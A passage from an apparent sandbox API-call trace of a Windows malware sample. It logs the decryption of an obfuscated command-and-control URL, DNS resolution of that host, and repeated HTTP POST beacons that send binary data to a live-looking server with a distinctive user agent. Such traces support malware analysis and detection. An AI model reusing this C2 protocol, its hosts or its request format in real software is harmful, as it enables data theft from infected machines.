(lpLibFileName="user32") returned 0x74f40000 [0170.567] wvsprintfA (in: param_1=0x644d68, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0170.567] GetProcessHeap () returned 0x620000 [0170.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0170.568] GetProcessHeap () returned 0x620000 [0170.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0170.568] GetProcessHeap () returned 0x620000 [0170.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6435f0 [0170.568] GetProcessHeap () returned 0x620000 [0170.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644d68 [0170.569] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0170.570] wvsprintfA (in: param_1=0x644d68, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0170.570] GetProcessHeap () returned 0x620000 [0170.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0170.570] GetProcessHeap () returned 0x620000 [0170.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0170.571] send (s=0x320, buf=0x63a880*, len=237, flags=0) returned 237 [0170.573] send (s=0x320, buf=0x6421e0*, len=159, flags=0) returned 159 [0170.573] GetProcessHeap () returned 0x620000 [0170.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644d68 [0170.573] recv (in: s=0x320, buf=0x644d68, len=4048, flags=0 | out: buf=0x644d68*) returned 237 [0171.708] GetProcessHeap () returned 0x620000 [0171.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0171.709] GetProcessHeap () returned 0x620000 [0171.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435f0 | out: hHeap=0x620000) returned 1 [0171.709] GetProcessHeap () returned 0x620000 [0171.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0171.709] GetProcessHeap () returned 0x620000 [0171.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0171.710] closesocket (s=0x320) returned 0 [0171.710] GetProcessHeap () returned 0x620000 [0171.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4d0 | out: hHeap=0x620000) returned 1 [0171.710] GetProcessHeap () returned 0x620000 [0171.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0171.710] GetProcessHeap () returned 0x620000 [0171.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0171.711] GetProcessHeap () returned 0x620000 [0171.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0171.711] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644d68, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1350) returned 0x320 [0171.713] Sleep (dwMilliseconds=0xea60) [0171.736] GetProcessHeap () returned 0x620000 [0171.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643170 [0171.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.737] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0171.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.743] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0171.759] GetProcessHeap () returned 0x620000 [0171.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0171.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.760] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0171.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.763] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0171.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.764] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0171.764] GetProcessHeap () returned 0x620000 [0171.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0171.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.766] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643170, pdwDataLen=0x19fcfc | out: pbData=0x643170, pdwDataLen=0x19fcfc) returned 1 [0171.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.767] CryptDestroyKey (hKey=0x62d710) returned 1 [0171.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.768] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0171.768] GetProcessHeap () returned 0x620000 [0171.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0171.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0171.769] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0171.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0171.770] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0171.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0171.771] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0171.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0171.772] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0171.772] GetProcessHeap () returned 0x620000 [0171.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0171.772] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0171.772] GetProcessHeap () returned 0x620000 [0171.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0171.773] GetProcessHeap () returned 0x620000 [0171.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0171.773] GetProcessHeap () returned 0x620000 [0171.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643170 | out: hHeap=0x620000) returned 1 [0171.774] GetProcessHeap () returned 0x620000 [0171.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643170 [0171.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.775] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0171.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.785] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0171.794] GetProcessHeap () returned 0x620000 [0171.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0171.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.795] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0171.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.796] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0171.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.797] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0171.797] GetProcessHeap () returned 0x620000 [0171.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0171.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.798] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643170, pdwDataLen=0x19fcfc | out: pbData=0x643170, pdwDataLen=0x19fcfc) returned 1 [0171.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.799] CryptDestroyKey (hKey=0x62d710) returned 1 [0171.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0171.800] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0171.800] GetProcessHeap () returned 0x620000 [0171.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0171.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0171.801] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0171.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0171.802] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0171.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0171.803] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0171.803] GetProcessHeap () returned 0x620000 [0171.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0171.803] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644b80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec58*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0171.812] GetProcessHeap () returned 0x620000 [0171.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4f0 [0171.812] socket (af=2, type=1, protocol=6) returned 0x324 [0171.812] connect (s=0x324, name=0x63ec58*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0171.862] FreeAddrInfoW (pAddrInfo=0x644b80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec58*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0171.862] GetProcessHeap () returned 0x620000 [0171.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0171.862] GetProcessHeap () returned 0x620000 [0171.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644d68 [0171.863] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0171.879] wvsprintfA (in: param_1=0x644d68, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0171.879] GetProcessHeap () returned 0x620000 [0171.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0171.881] GetProcessHeap () returned 0x620000 [0171.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0171.882] GetProcessHeap () returned 0x620000 [0171.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642ee8 [0171.882] GetProcessHeap () returned 0x620000 [0171.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644d68 [0171.882] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0171.883] wvsprintfA (in: param_1=0x644d68, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0171.883] GetProcessHeap () returned 0x620000 [0171.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0171.883] GetProcessHeap () returned 0x620000 [0171.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0171.884] send (s=0x324, buf=0x63a880*, len=237, flags=0) returned 237 [0171.885] send (s=0x324, buf=0x6421e0*, len=159, flags=0) returned 159 [0171.885] GetProcessHeap () returned 0x620000 [0171.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644d68 [0171.885] recv (in: s=0x324, buf=0x644d68, len=4048, flags=0 | out: buf=0x644d68*) returned 237 [0173.659] GetProcessHeap () returned 0x620000 [0173.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0173.659] GetProcessHeap () returned 0x620000 [0173.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ee8 | out: hHeap=0x620000) returned 1 [0173.660] GetProcessHeap () returned 0x620000 [0173.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0173.660] GetProcessHeap () returned 0x620000 [0173.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0173.660] closesocket (s=0x324) returned 0 [0173.661] GetProcessHeap () returned 0x620000 [0173.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4f0 | out: hHeap=0x620000) returned 1 [0173.661] GetProcessHeap () returned 0x620000 [0173.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0173.661] GetProcessHeap () returned 0x620000 [0173.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643170 | out: hHeap=0x620000) returned 1 [0173.661] GetProcessHeap () returned 0x620000 [0173.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0173.662] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644d68, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x134c) returned 0x324 [0173.663] Sleep (dwMilliseconds=0xea60) [0173.667] GetProcessHeap () returned 0x620000 [0173.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0173.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.668] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.675] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0173.690] GetProcessHeap () returned 0x620000 [0173.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0173.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.691] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0173.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.692] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.693] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.693] GetProcessHeap () returned 0x620000 [0173.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0173.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.694] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0173.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.695] CryptDestroyKey (hKey=0x62d710) returned 1 [0173.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.696] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0173.696] GetProcessHeap () returned 0x620000 [0173.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x628a78 [0173.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0173.697] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0173.698] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0173.699] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0173.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0173.702] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0173.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0173.703] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0173.703] GetProcessHeap () returned 0x620000 [0173.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0173.703] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0173.704] GetProcessHeap () returned 0x620000 [0173.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0173.704] GetProcessHeap () returned 0x620000 [0173.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x628a78 | out: hHeap=0x620000) returned 1 [0173.705] GetProcessHeap () returned 0x620000 [0173.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0173.705] GetProcessHeap () returned 0x620000 [0173.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643200 [0173.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.706] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.715] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0173.722] GetProcessHeap () returned 0x620000 [0173.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0173.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.723] CryptImportKey (in: hProv=0x63ba90, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0173.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.724] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.725] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.725] GetProcessHeap () returned 0x620000 [0173.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0173.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.727] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643200, pdwDataLen=0x19fcfc | out: pbData=0x643200, pdwDataLen=0x19fcfc) returned 1 [0173.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.728] CryptDestroyKey (hKey=0x62d710) returned 1 [0173.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0173.729] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0173.729] GetProcessHeap () returned 0x620000 [0173.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x628a78 [0173.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0173.732] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0173.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0173.734] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0173.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0173.735] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0173.735] GetProcessHeap () returned 0x620000 [0173.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0173.735] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6446f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec28*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0173.737] GetProcessHeap () returned 0x620000 [0173.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b670 [0173.737] socket (af=2, type=1, protocol=6) returned 0x328 [0173.738] connect (s=0x328, name=0x63ec28*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0173.787] FreeAddrInfoW (pAddrInfo=0x6446f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec28*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0173.787] GetProcessHeap () returned 0x620000 [0173.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0173.787] GetProcessHeap () returned 0x620000 [0173.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644d68 [0173.790] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0173.792] wvsprintfA (in: param_1=0x644d68, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0173.792] GetProcessHeap () returned 0x620000 [0173.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0173.792] GetProcessHeap () returned 0x620000 [0173.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d68 | out: hHeap=0x620000) returned 1 [0173.792] GetProcessHeap () returned 0x620000 [0173.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642e58 [0173.793] GetProcessHeap () returned 0x620000 [0173.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644d68 [0173.794] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0173.795] wvsprintfA (in: param_1=0x644d68, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0173.795] GetProcessHeap () returned 0x620000 [0173.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0173.795] GetProcessHeap () returned 